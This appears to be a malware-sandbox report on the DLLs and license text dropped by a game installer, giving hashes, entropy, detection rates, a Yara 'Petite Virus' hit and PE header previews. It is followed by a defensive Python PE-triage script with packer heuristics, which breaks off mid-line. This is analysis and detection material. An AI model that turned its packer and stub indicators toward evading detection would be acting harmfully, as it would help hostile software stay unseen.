                                                                                  SHA-512:13214E191C6D94DB914835577C048ADF2240C7335C0A2C2274C096114B7B75CD2CE13A76316963CCD55EE371631998FAC678FCF82AE2AE178B7813B2C35C6651
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):19008
                                                                                  Entropy (8bit):7.672481244971812
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:dz7otnjFa4ECX3yeGjA+tSXGnUav92hca+XWRlsuG+is:po7GU+szS3W7sQ7
                                                                                  MD5:8EE91149989D50DFCF9DAD00DF87C9B0
                                                                                  SHA1:E5581E6C1334A78E493539F8EA1CE585C9FFAF89
                                                                                  SHA-256:3030E22F4A854E11A8AA2128991E4867CA1DF33BC7B9AFF76A5E6DEEF56927F6
                                                                                  SHA-512:FA04E8524DA444DD91E4BD682CC9ADEE445259E0C6190A7DEF82B8C4478A78AAA8049337079AD01F7984DBA28316D72445A0F0D876F268A062AD9B8FF2A6E58D
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):68876
                                                                                  Entropy (8bit):7.922125376804506
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:q0Z4sz1ZMjCjDIhoLffiedENahBzzxO/JfgmYFGKEvi8TxCI+vHVl:v4MzMjGkhoLfsahS/JYN2vUl
                                                                                  MD5:4E35BA785CD3B37A3702E577510F39E3
                                                                                  SHA1:A2FD74A68BEFF732E5F3CB0835713AEA8D639902
                                                                                  SHA-256:0AFE688B6FCA94C69780F454BE65E12D616C6E6376E80C5B3835E3FA6DE3EB8A
                                                                                  SHA-512:1B839AF5B4049A20D9B8A0779FE943A4238C8FBFBF306BC6D3A27AF45C76F6C56B57B2EC8F087F7034D89B5B139E53A626A8D7316BE1374EAC28B06D23E7995D
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):17472
                                                                                  Entropy (8bit):7.524548435291935
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:IwwsQD13cT5HhSVeEQNW5kbbcGEh/qTio+lyTnGy:QRD13ySVeEOW5kbSSTHNTnr
                                                                                  MD5:7B52BE6D702AA590DB57A0E135F81C45
                                                                                  SHA1:518FB84C77E547DD73C335D2090A35537111F837
                                                                                  SHA-256:9B5A8B323D2D1209A5696EAF521669886F028CE1ECDBB49D1610C09A22746330
                                                                                  SHA-512:79C1959A689BDC29B63CA771F7E1AB6FF960552CADF0644A7C25C31775FE3458884821A0130B1BAB425C3B41F1C680D4776DD5311CE3939775A39143C873A6FE
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):35588
                                                                                  Entropy (8bit):7.817557274117395
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:dCrMZHv56WRldhmLjQDrbfc8cznHvc6modHQ:sAR0LzHvc6m2HQ
                                                                                  MD5:58521D1AC2C588B85642354F6C0C7812
                                                                                  SHA1:5912D2507F78C18D5DC567B2FA8D5AE305345972
                                                                                  SHA-256:452EEE1E4EF2FE2E00060113CCE206E90986E2807BB966019AC4E9DEB303A9BD
                                                                                  SHA-512:3988B61F6B633718DE36C0669101E438E70A17E3962A5C3A519BDECC3942201BA9C3B3F94515898BB2F8354338BA202A801B22129FC6D56598103B13364748C1
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:Unicode text, UTF-8 text
                                                                                  Category:dropped
                                                                                  Size (bytes):1059
                                                                                  Entropy (8bit):5.1208137218866945
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:LLDrmJHHH0yN3gtsHw1hj9QHOsUv4eOk4/+/m3oqLF5n:LLDaJHlxE35QHOs5exm3ogF5n
                                                                                  MD5:B7EDCC6CB01ACE25EBD2555CF15473DC
                                                                                  SHA1:2627FF03833F74ED51A7F43C55D30B249B6A0707
                                                                                  SHA-256:D6B4754BB67BDD08B97D5D11B2D7434997A371585A78FE77007149DF3AF8D09C
                                                                                  SHA-512:962BD5C9FB510D57FAC0C3B189B7ADEB29E00BED60F0BB9D7E899601C06C2263EDA976E64C352E4B7C0AAEFB70D2FCB0ABEF45E43882089477881A303EB88C09
                                                                                  Malicious:false
                                                                                  Preview:Copyright (c) 2011 Jan Kokem.ller..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CONNECTION WITH
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):16910
                                                                                  Entropy (8bit):5.289608933932413
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:ohtyjknGC7hipL+9mLYFOozxkdlDNUwS5Qq:UGknGC74l+MUFI7C
                                                                                  MD5:2F040608E68E679DD42B7D8D3FCA563E
                                                                                  SHA1:4B2C3A6B8902E32CDA33A241B24A79BE380C55FC
                                                                                  SHA-256:6B980CADC3E7047CC51AD1234CB7E76FF520149A746CB64E5631AF1EA1939962
                                                                                  SHA-512:718AF5BE259973732179ABA45B672637FCA21AE575B4115A62139A751C04F267F355B8F7F7432B56719D91390DABA774B39283CBCFE18F09CA033389FB31A4FC
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):15374
                                                                                  Entropy (8bit):5.192037544202194
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:lhgkOI7BGi9gKV6uq+u6JewsNhNXUwSCgQ:DT7BGVKPKbXF
                                                                                  MD5:BEFD36FE8383549246E1FD49DB270C07
                                                                                  SHA1:1EF12B568599F31292879A8581F6CD0279F3E92A
                                                                                  SHA-256:B5942E8096C95118C425B30CEC8838904897CDEF78297C7BBB96D7E2D45EE288
                                                                                  SHA-512:FD9AA6A4134858A715BE846841827196382D0D86F2B1AA5C7A249B770408815B0FE30C4D1E634E8D6D3C8FEDBCE4654CD5DC240F91D54FC8A7EFE7CAE2E569F4
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):197646
                                                                                  Entropy (8bit):6.1570532273946625
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:brPGp0y4SP+iBGgySYm+dE3sYrJqkAzhU88vsAGSW+:brPGaTEsHSYmbbOU8osAGG
                                                                                  MD5:2C8EC61630F8AA6AAC674E4C63F4C973
                                                                                  SHA1:64E3BB9AA505C66E87FE912D4EA3054ADF6CEF76
                                                                                  SHA-256:DFD55D0DDD1A7D081FCE8E552DC29706A84DC6CA2FDD2F82D63F33D74E882849
                                                                                  SHA-512:488378012FB5F477ED4636C37D7A883B1DAD0FBC671D238B577A9374EFE40AB781F5E483AE921F1909A9B7C1C2A3E78E29B533D3B6FFE15AAEE840CAD2DCF5D0
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):31936
                                                                                  Entropy (8bit):6.6461204214578
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:SEEn30ilOAb++HynTDbc3fwaVCPxWE/MM:SEa0YOU1HgU3fwaVCPxqM
                                                                                  MD5:72E3BDD0CE0AF6A3A3C82F3AE6426814
                                                                                  SHA1:A2FB64D5B9F5F3181D1A622D918262CE2F9A7AA3
                                                                                  SHA-256:7AC8A8D5679C96D14C15E6DBC6C72C260AAEFB002D0A4B5D28B3A5C2B15DF0AB
                                                                                  SHA-512:A876D0872BFBF099101F7F042AEAF1FD44208A354E64FC18BAB496BEEC6FDABCA432A852795CFC0A220013F619F13281B93ECC46160763AC7018AD97E8CC7971
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):197120
                                                                                  Entropy (8bit):6.423554884287906
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:X+dMKihenEUunaA+mVMISPCG5vHglwiaJVZkRyAHeOdrQpCklkHy+axeY0R2JdXs:MagxOOZWP2dC28d+y2e
                                                                                  MD5:67247C0ACA089BDE943F802BFBA8752C
                                                                                  SHA1:508DA6E0CF31A245D27772C70FFA9A2AE54930A3
                                                                                  SHA-256:BAB8D388EA3AF1AABB61B8884CFAA7276A2BFD77789856DD610480C55E4D0A60
                                                                                  SHA-512:C4A690A53581D3E4304188FD772C6F1DA1C72ED2237A13951ACE8879D1986423813A6F7534FF506790CB81633CEB7FF6A6239C1F852725FBACA4B40D9AE3F2DB
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d,.. M.. M.. M..4&..-M..4&...M..4&..3M..r8...M..r8../M..r8..1M..4&..#M.. M.._M..v8..$M..v8..!M..v8..!M..v8..!M..Rich M..........PE..L... ..a...........!.........................................................@............@.........................@...p.......(............................ ..(...P...8...............................@...............H............................text...>........................... ..`.rdata..d...........................@..@.data...H...........................@....rsrc...............................@..@.reloc..(.... ......................@..B........................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):115712
                                                                                  Entropy (8bit):6.401537154757194
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:rY4gILp0Vt7BMkvfHutO+eP0ZjflQf5xqkYXeo21sb2rqG70:rY4gILp0Vt77nLBCtQfjqv8qG70
                                                                                  MD5:840D631DA54C308B23590AD6366EBA77
                                                                                  SHA1:5ED0928667451239E62E6A0A744DA47C74E1CF89
                                                                                  SHA-256:6BAD60DF9A560FB7D6F8647B75C367FDA232BDFCA2291273A21179495DAC3DB9
                                                                                  SHA-512:1394A48240BA4EF386215942465BDE418C5C6ED73FC935FE7D207D2A1370155C94CDC15431985ED4E656CA6B777BA79FFC88E78FA3D99DB7E0E6EAC7D1663594
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?..R{...{...{...o...q...o.......o...i...)...W...)...t...)...j...o...x...{.......-...s...-...z...-.4.z...-...z...Rich{...........PE..L....H.a...........!.....$...........h.......@............................... ............@.............................x.......(.......................................8..............................@............@..D............................text....#.......$.................. ..`.rdata...x...@...z...(..............@..@.data.... ..........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):62478
                                                                                  Entropy (8bit):6.063363187934607
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:q3s6+NMpjqudP/XB9rGCWLEc6wY3U0LvDcb0wGNPdqdRJy/5f4mdajO42iySAqB:q8zNM1nBId/ce7GNP6m/5AQGySAs
                                                                                  MD5:940EEBDB301CB64C7EA2E7FA0646DAA3
                                                                                  SHA1:0347F029DA33C30BBF3FB067A634B49E8C89FEC2
                                                                                  SHA-256:B0B56F11549CE55B4DC6F94ECBA84AEEDBA4300D92F4DC8F43C3C9EEEFCBE3C5
                                                                                  SHA-512:50D455C16076C0738FB1FECAE7705E2C9757DF5961D74B7155D7DFB3FAB671F964C73F919CC749D100F6A90A3454BFF0D15ED245A7D26ABCAA5E0FDE3DC958FD
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...............................k.........................`................ .........................r.......D............................P..|.......................................................\............................text...............................`.P`.data...0...........................@.0..rdata..8...........................@.`@/4......L...........................@.0@.bss..................................`..edata..r...........................@.0@.idata..D...........................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc..|....P......................@.0B................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):26126
                                                                                  Entropy (8bit):6.048294343792499
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:hhkxE9v7/GRm4v5OxlBWaEybb9p7aCyS/hU7CateHcUwSCnq6D:Yx6jGXvc5WaBb99yS/hQh
                                                                                  MD5:D1223F86EDF0D5A2D32F1E2AAAF8AE3F
                                                                                  SHA1:C286CA29826A138F3E01A3D654B2F15E21DBE445
                                                                                  SHA-256:E0E11A058C4B0ADD3892E0BEA204F6F60A47AFC86A21076036393607235B469C
                                                                                  SHA-512:7EA1FFB23F8A850F5D3893C6BB66BF95FAB2F10F236A781620E9DC6026F175AAE824FD0E03082F0CF13D05D13A8EEDE4F5067491945FCA82BBCDCF68A0109CFF
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........f.........#.....6...b...............P.....h................................8-........ .........................i...................................................................Lk......................................................text....4.......6..................`.P`.data...,....P.......:..............@.0..rdata.......`.......<..............@.`@/4......T....p.......J..............@.0@.bss..................................`..edata..i............V..............@.0@.idata...............X..............@.0..CRT....,............^..............@.0..tls.................`..............@.0..reloc...............b..............@.0B................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):648384
                                                                                  Entropy (8bit):6.666474522542094
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:gAQxmcOwzIYhoz/eZz4gOIwEODAAwnq6Nql1:gvmfAI6oz/uOIyDAAwDNql1
                                                                                  MD5:CE7DE939D74321A7D0E9BDF534B89AB9
                                                                                  SHA1:56082B4E09A543562297E098A36AADC3338DEEC5
                                                                                  SHA-256:A9DC70ABB4B59989C63B91755BA6177C491F6B4FE8D0BFBDF21A4CCF431BC939
                                                                                  SHA-512:03C366506481B70E8BF6554727956E0340D27CB2853609D6210472AEDF4B3180C52AAD9152BC2CCCBA005723F5B2E3B5A19D0DCE8B8D1E0897F894A4BFEEFE55
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...".t.........................g.........................0................ ..........................................................,.......=..........................,=.......................................................text....r.......t..................`.P`.data............ ...x..............@.`..rdata..L...........................@.`@/4...................\..............@.0@.bss..................................`..edata...............`..............@.0@.idata...............j..............@.0..CRT....,............v..............@.0..tls.................x..............@.0..reloc...=.......>...z..............@.0B................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):62478
                                                                                  Entropy (8bit):6.063363187934607
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:q3s6+NMpjqudP/XB9rGCWLEc6wY3U0LvDcb0wGNPdqdRJy/5f4mdajO42iySAqB:q8zNM1nBId/ce7GNP6m/5AQGySAs
                                                                                  MD5:940EEBDB301CB64C7EA2E7FA0646DAA3
                                                                                  SHA1:0347F029DA33C30BBF3FB067A634B49E8C89FEC2
                                                                                  SHA-256:B0B56F11549CE55B4DC6F94ECBA84AEEDBA4300D92F4DC8F43C3C9EEEFCBE3C5
                                                                                  SHA-512:50D455C16076C0738FB1FECAE7705E2C9757DF5961D74B7155D7DFB3FAB671F964C73F919CC749D100F6A90A3454BFF0D15ED245A7D26ABCAA5E0FDE3DC958FD
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...............................k.........................`................ .........................r.......D............................P..|.......................................................\............................text...............................`.P`.data...0...........................@.0..rdata..8...........................@.`@/4......L...........................@.0@.bss..................................`..edata..r...........................@.0@.idata..D...........................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc..|....P......................@.0B................................................................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):906766
                                                                                  Entropy (8bit):6.450201653594769
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:sxJadtgtogJr8nFWojn51vDBgpOpJyqMvDQAmJ:bWoer+Fhjn51vDBgpKMvDeJ
                                                                                  MD5:AF785965AB0BF2474B3DD6E53DA2F368
                                                                                  SHA1:EF9EECBD07CCBD3069B30AA1671C2093FA38FEB6
                                                                                  SHA-256:8CDF4CAD48406CDB2FF6F4F08A8BCAF41B9A5A656CC341F2757B610A7ACA706A
                                                                                  SHA-512:5F69C61E38D6930F8084DCE001BD592C681850F073F1B82E2914F448750E7514E2B0F8F7591BCB089C84D91FC9F51E96CFC03D204AE052564820723E57B6FE27
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........#...).R...................p...............................P......5.....@... .........................WD..............p.......................|;...........................+......................X................................text....Q.......R..................`..`.data...L....p.......V..............@....rdata...............Z..............@..@/4...........p.......F..............@..@.bss....4....p...........................edata..WD.......F...>..............@..@.idata..............................@....CRT....,...........................@....tls................................@....rsrc...p...........................@..@.reloc..|;.......<..................@..B........................................................................................................................................................................................
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):36416
                                                                                  Entropy (8bit):7.842278356440954
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:lshkyPXvH6bPACtmb8boNQdVfCXewki/OvXEApOqmFfSq1oIQMW:lsh3n5Pb8boOdVCuwNEXEAonfSq1JQb
                                                                                  MD5:BEBA64522AA8265751187E38D1FC0653
                                                                                  SHA1:63FFB566AA7B2242FCC91A67E0EDA940C4596E8E
                                                                                  SHA-256:8C58BC6C89772D0CD72C61E6CF982A3F51DEE9AAC946E076A0273CD3AAF3BE9D
                                                                                  SHA-512:13214E191C6D94DB914835577C048ADF2240C7335C0A2C2274C096114B7B75CD2CE13A76316963CCD55EE371631998FAC678FCF82AE2AE178B7813B2C35C6651
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...................................D.... ..PE..L....}.Q...........!................6 ............`..........................0......................................d#.......!..........@...................t...........................................................................................................................`....rsrc...........@...................@..@....................................@................ ......................`.......................................X...{.......j...f.!.PRj.....j..S.ERROR!.Corrupt Data!... c.f.`P....h.p..j..P..C.h..`..<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X....................Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$...*.P(.*.....P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I.....................]...............'..................................A...%...........
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):8456
                                                                                  Entropy (8bit):6.767152008521429
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:yxPHUtfhriUVoSoGtyo2xmJ8GbarAtT7/lxjFZnPK0cl:KPehriU3t2IiGbHTxZnPK0cl
                                                                                  MD5:19E08B7F7B379A9D1F370E2B5CC622BD
                                                                                  SHA1:3E2D2767459A92B557380C5796190DB15EC8A6EA
                                                                                  SHA-256:AC97E5492A3CE1689A2B3C25D588FAC68DFF5C2B79FCF4067F2D781F092BA2A1
                                                                                  SHA-512:564101A9428A053AA5B08E84586BCBB73874131154010A601FCE8A6FC8C4850C614B4B0A07ACF2A38FD2D4924D835584DB0A8B49EF369E2E450E458AC32CF256
                                                                                  Malicious:false
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-6ND5B.tmp, Author: Joe Security
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...................................D.... ..PE..L...#.MZ...........!.................p.......0............................................@.........................Pr.......q..d....P..8....................%.......................................................q..8....................................@..........................@..@.rsrc........P......................@..@.............`.........................@petite.......p......................`..`..................................................l..a.......1...3W..Z.....H...5.(...$.. .>X9..Fn... ..."j1..........%.7.d...".m...n.ePY......`....I.gYo..UC....Rq(...F......s..8`.I.....i..F.....'......@..-;.........J...Oq...b@...........$.D4E..($.....8':*;.q....[-..{..w....@M....J$..0d..9Q.I^.^y.E..*L_-.x!s.......W.H.R..@.6....MQ.Q8.s.."...!."IX.vM...!e.$%......U.....F.CoI..X.dA...0.Y..r.8.*p...<..M y...8..s....N5<.J....&..`...w..'..\s..%..A.`....s..j.H...X#..R.\..)R3@..X.P.5...G..t.f/..C.b.d...|.
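The fields the entries above rest on (the 8-bit entropy value, the section names visible in each Preview, the "nameless sections" signature in the overview, the `.petite` section and the `ERROR!<byte>Corrupt Data!` stub string in the Yara-flagged file) can all be re-derived from the raw bytes. The following stdlib-only Python script is an added example, not Joe Sandbox code and not part of the original report: it computes the same Shannon entropy, walks the COFF section table, and applies a few packer heuristics of its own. The sample PE is constructed inline (it is not one of the dropped files), and the packer section-name list, the stub regex and the entropy threshold are this example's assumptions rather than the sandbox's rules.

```python
"""Triage of a dropped PE: entropy, section table, packer hints (added example)."""
import hashlib
import math
import re
import struct
from collections import Counter

IMAGE_FILE_MACHINE_I386 = 0x014C
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
# Assumption: short, non-exhaustive list of section names common packers leave behind.
PACKER_SECTION_NAMES = {".petite", "upx0", "upx1", ".aspack", ".mpress1"}
# The previews show one non-printable byte between the two words; match any byte there.
PETITE_STUB_RE = re.compile(rb"ERROR!.Corrupt Data!", re.DOTALL)


def shannon_entropy(data):
    """8-bit Shannon entropy in bits per byte, 0.0..8.0, as in the report's 'Entropy (8bit)'."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_pe(pe):
    """Read the COFF header and section table with struct only (no pefile dependency).
    Names such as '/4' (GCC long names) are offsets into the COFF string table and are
    returned verbatim; resolving them is out of scope here."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not at e_lfanew")
    coff = e_lfanew + 4
    machine, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", pe, coff)
    table = coff + 20 + opt_size
    sections = []
    for i in range(nsec):
        name, vsize, _va, rawsize, rawptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", pe, table + 40 * i)
        raw = pe[rawptr:rawptr + rawsize] if rawsize else b""
        sections.append({
            "index": i,
            "name": name.rstrip(b"\0").decode("latin-1"),
            "virtual_size": vsize,
            "raw_size": rawsize,
            "entropy": round(shannon_entropy(raw), 3),
            "rwx": bool(chars & IMAGE_SCN_MEM_EXECUTE) and bool(chars & IMAGE_SCN_MEM_WRITE),
        })
    return {"machine": machine, "sections": sections}


def triage(pe):
    """Hashes, whole-file entropy and packer findings for one PE image."""
    info = parse_pe(pe)
    findings = []
    for s in info["sections"]:
        label = s["name"] or "#%d" % s["index"]
        if not s["name"]:
            findings.append("nameless section %s" % label)
        if s["name"].lower() in PACKER_SECTION_NAMES:
            findings.append("packer section name %r" % s["name"])
        if s["raw_size"] == 0 and s["virtual_size"] > 0:
            findings.append("section %s has no raw data but %#x virtual bytes (unpack target?)"
                            % (label, s["virtual_size"]))
        if s["entropy"] > 7.0:  # assumption: threshold for compressed/encrypted content
            findings.append("section %s entropy %.2f (compressed/encrypted?)" % (label, s["entropy"]))
        if s["rwx"]:
            findings.append("section %s is writable and executable" % label)
    if PETITE_STUB_RE.search(pe):
        findings.append("Petite-style unpacker stub string 'ERROR! Corrupt Data!' present")
    return {
        "md5": hashlib.md5(pe).hexdigest().upper(),
        "sha256": hashlib.sha256(pe).hexdigest().upper(),
        "size": len(pe),
        "entropy": round(shannon_entropy(pe), 3),
        "machine": info["machine"],
        "sections": info["sections"],
        "findings": findings,
    }


def build_sample_pe(sections):
    """Constructed toy PE32 (DOS header, PE header, section table, raw data).
    sections: list of (name_bytes, raw_data, characteristics). Only the fields
    parse_pe() reads are meaningful; the image is not loadable."""
    opt_size = 224                                    # PE32 optional header size
    hdr_end = 0x40 + 4 + 20 + opt_size + 40 * len(sections)
    raw_ptr = (hdr_end + 0x1FF) & ~0x1FF              # first raw section on a 512-byte boundary
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)           # e_lfanew
    coff = struct.pack("<HHIIIHH", IMAGE_FILE_MACHINE_I386, len(sections), 0, 0, 0, opt_size, 0x2102)
    opt = struct.pack("<H", 0x10B) + bytes(opt_size - 2)  # PE32 magic, remainder zeroed
    table, body, va = b"", b"", 0x1000
    for name, data, chars in sections:
        padded = data + bytes(-len(data) % 0x200)
        ptr = raw_ptr + len(body) if data else 0      # raw-less sections carry no file pointer
        table += struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), max(len(data), 0x1000), va,
                             len(padded), ptr, 0, 0, 0, 0, chars)
        body += padded
        va += 0x1000 * (1 + len(padded) // 0x1000)
    header = bytes(dos) + b"PE\0\0" + coff + opt + table
    return header + bytes(raw_ptr - len(header)) + body


# Constructed sample shaped like a packed DLL: empty .text (unpack target), a nameless
# high-entropy payload section, and a ".petite" stub section carrying the error string.
_payload = b"".join(hashlib.sha256(i.to_bytes(4, "little")).digest() for i in range(64))
SAMPLE_PE = build_sample_pe([
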